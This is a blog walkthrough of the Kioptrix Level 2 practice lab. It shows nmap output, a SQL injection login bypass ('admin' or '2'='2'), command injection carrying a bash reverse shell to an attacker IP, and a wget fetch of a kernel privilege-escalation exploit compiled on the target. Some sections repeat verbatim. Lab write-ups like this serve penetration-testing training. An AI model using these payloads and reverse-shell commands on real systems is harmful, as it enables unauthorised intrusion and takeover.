KIOPTRIX LAB LEVEL [II]
The roadmap for exploiting this machine using my way and the knowledge that you should understand are the follows:
1. Know how to exploit Sql Injection in order to, bypass the application login on the index.php2. Know how to modify the web content of vulnerable application on the client browser side.3. Know how to exploit Remote Command Eexcution, via form .4. Know how to obtain a reverse shell with apache user.5. Know how to make Priviledge escalation exploiting a knowledge kernel vulnerability on the operative system.
You can find all the penetration testing process of this machine, on the following video:
Complete walktrough, of the season content:
RECOGNITION PHASE:
NETWORK DISCOVER:
We can use a couple of tools in order to make this task, ane of them is arp-scan that use request over arp protocol on broadcast mode, and wait for the hosts response via this type of protocol as you can see below:
The other tool is netdiscover, with the same concept but using an interface like parameter:
NMAP:
On this step, from the attaker machine we recover information about the open ports and services of out target machine. We can use some options in order to execute scripts and obtain information about vulnerabilities on the external host.
# Nmap 7.91 scan initiated Sun Aug 8 11:43:48 2021 as: nmap -sC -sV -T4 -n -oN target_name 192.168.1.102
Nmap scan report for 192.168.1.102
Host is up (0.00082s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 787/udp status
|_ 100024 1 790/tcp status
443/tcp open ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2021-08-07T08:53:41+00:00; -1d00h50m15s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
Host script results:
|_clock-skew: -1d00h50m15s
# Nmap 7.91 scan initiated Sun Aug 8 11:43:48 2021 as: nmap -sC -sV -T4 -n -oN target_name 192.168.1.102
Nmap scan report for 192.168.1.102
Host is up (0.00082s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 787/udp status
|_ 100024 1 790/tcp status
443/tcp open ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2021-08-07T08:53:41+00:00; -1d00h50m15s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
Host script results:
|_clock-skew: -1d00h50m15s
The conclusion of nmap scan is that we found the following open ports with the services:
EXPLOTATION:
On the exploitation phase we are going to check all services and versions that there are open on the victim machine.
22: ssh
ssh root@192.168.1.102
Unable to negotiate with 192.168.1.102 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
It's seems that the target machine has an error with the cryptography configuration for make an encrypted connection.
80: http and 443:https
Exploiting tho login panel via SQl Injection, using burpsuit community edition such a proxy for intercept the request between the user browser and apache server.
Intercepted request:
Intruder module with user parameter like a variable for injection process:
**Using a Sql Injection wordlist for attack process
Order the server responses by length on ascendent mode:
And finally we found one of the vulnerable sentences admin' or '2'='2' on this login:
Using this sentece we gaing access to application bypassing the login, but on the next web we found a codification mistake on the html code and for this reason the web application don't display correctly the form content:
How to resolve the problem : 1. Obtain the source code of the web application from the user browser 2. Solve the mistakes and change the form redirection with am absolute path. 3. Publish the web content on the web server attaker machine i.e apache2 service.
Original source code:
Modified source code:
Publish the code on the attaker web server:
Exploiting tho login panel via SQl Injection, using burpsuit community edition such a proxy for intercept the request between the user browser and apache server.
Intercepted request:
Intruder module with user parameter like a variable for injection process:
**Using a Sql Injection wordlist for attack process
Order the server responses by length on ascendent mode:
And finally we found one of the vulnerable sentences admin' or '2'='2' on this login:
How to resolve the problem :
1. Obtain the source code of the web application from the user browser
2. Solve the mistakes and change the form redirection with am absolute path.
3. Publish the web content on the web server attaker machine i.e apache2 service.
Publish the code on the attaker web server:
kali@kali:/var/www/html$ sudo /etc/init.d/apache2 start
Starting apache2 (via systemctl): apache2.service.
Nice, rigth now with our custom web page we can try to execute request to the following target from the attacker machine on the victim machine:
In that case the source code of the application <php code > is vulnerable too and we found a remote code execution on the target server:
The server response:
gaining access to the target machine via reverse shell:On the form field:
192.168.1.1; bash -i >& /dev/tcp/192.168.1.42/8989 0>&1
On the attacker machine:
Explaining process:
In that case the source code of the application <php code > is vulnerable too and we found a remote code execution on the target server:
The server response:
gaining access to the target machine via reverse shell:
On the form field:
PRIVILEDGE ESCALATION:
Kernel version with a known public vulnerability that contains an exploit:
https://www.exploit-db.com/raw/9542
Get exploit from attacker machine:
bash-3.00$ wget http://192.168.1.42:8989/9542
--06:01:24-- http://192.168.1.42:8989/9542
=> `9542'
Connecting to 192.168.1.42:8989... connected.
HTTP request sent,
awaiting response... 200 OK
Length: 2,643 (2.6K) [application/octet-stream]
0K .. 100% 840.19 MB/s
06:01:24 (840.19 MB/s) - `9542' saved [2643/2643]
Compile exploit on target machine:
bash-3.00$ mv 9542 9542.c
bash-3.00$ gcc -o kernel_exploit 9542.c
9542.c:109:28: warning: no newline at end of file
bash-3.00$ ls -ltrh
total 112K
-rwxr-xr-x 1 apache apache 6.8K Aug 7 06:02 kernel_exploit
-rw-r--r-- 1 apache apache 2.6K Aug 8 2021 9542.c
And finally we execute it:
And this is all for this lab level, I hope that you visit the next walktrough level[|||], on my next post in the same blog, [https://roadtooscp-f0ns1.blogspot.com/] and we'll keep in touch.
with kind regards, f0ns1
No comments:
Post a Comment